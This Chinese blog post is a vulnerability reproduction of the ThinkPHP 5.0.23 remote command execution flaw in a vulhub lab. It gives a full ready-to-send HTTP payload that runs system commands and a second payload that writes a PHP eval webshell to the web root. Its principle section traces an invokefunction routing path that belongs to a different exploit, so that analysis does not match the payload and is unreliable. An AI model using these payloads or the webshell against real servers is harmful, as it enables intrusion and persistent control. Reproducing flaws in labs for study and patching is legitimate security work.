漏洞复现-thinkphp5.0.23-远程命令执行
0x00 实验环境
攻击机:Win 10
靶场:docker拉的vulhub靶场
0x01 影响版本
其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。
0x02 漏洞复现
(1)访问存在的漏洞页面,输入以下payload:
POST /index.php?s=captcha HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: settingStore=1630480512401_0 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 73 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
(2)写shell:首先复制当前路径,然后写入shell即可,vulhub的靶场$符号被转义了,加个斜杠即可:
/var/www/public
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval(\$_POST[x]); ?>" > /var/www/public/h.php
(3)连接成功!
0x03 漏洞原理
public\index.php----->跟进/../thinkphp/start.php----->\thinkphp\library\think\App.php的run函数
这个run函数有个监听的方法:
// 监听 app_dispatch Hook::listen('app_dispatch', self::$dispatch); // 获取应用调度信息 $dispatch = self::$dispatch; // 未设置调度信息则进行 URL 路由检测 if (empty($dispatch)) { $dispatch = self::routeCheck($request, $config); }
变量$dispatch为空,所以进入routeCheck函数,跟入到此函数
public static function routeCheck($request, array $config) { $path = $request->path(); $depr = $config['pathinfo_depr']; $result = false; // 路由检测 $check = !is_null(self::$routeCheck) ? self::$routeCheck : $config['url_route_on']; if ($check) { // 开启路由 if (is_file(RUNTIME_PATH . 'route.php')) { // 读取路由缓存 $rules = include RUNTIME_PATH . 'route.php'; is_array($rules) && Route::rules($rules);
这里可以打印一下路径,以及一些变量,能得到:
路径变量$path为index/think\app/invokefunction,POC中剩余变量存储在$_GET中,继续往下跟routeCheck函数,进入
路由无效
关键代码如下:
// 路由无效 解析模块/控制器/操作/参数... 支持控制器自动搜索 if (false === $result) { $result = Route::parseUrl($path, $depr, $config['controller_auto_search']); }
代码会进入到Route::parseUrl函数,此函数用来解析变量$path(index/think\app/invokefunction),跟进到此函数:
// 请求缓存检查 $request->cache( $config['request_cache'], $config['request_cache_expire'], $config['request_cache_except'] ); $data = self::exec($dispatch, $config); } catch (HttpResponseException $exception) { $data = $exception->getResponse(); }
最终会有个exec的函数,反正就是这个函数执行的,就暂时到这里。详细的看这篇文章:https://www.cnblogs.com/st404/p/10245844.html
0x04 修复建议
1、升级到高版本
0x05 参考文献
https://www.cnblogs.com/jiecoll/p/13425469.html
https://www.cnblogs.com/st404/p/10245844.html
0x06 免责声明
本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!
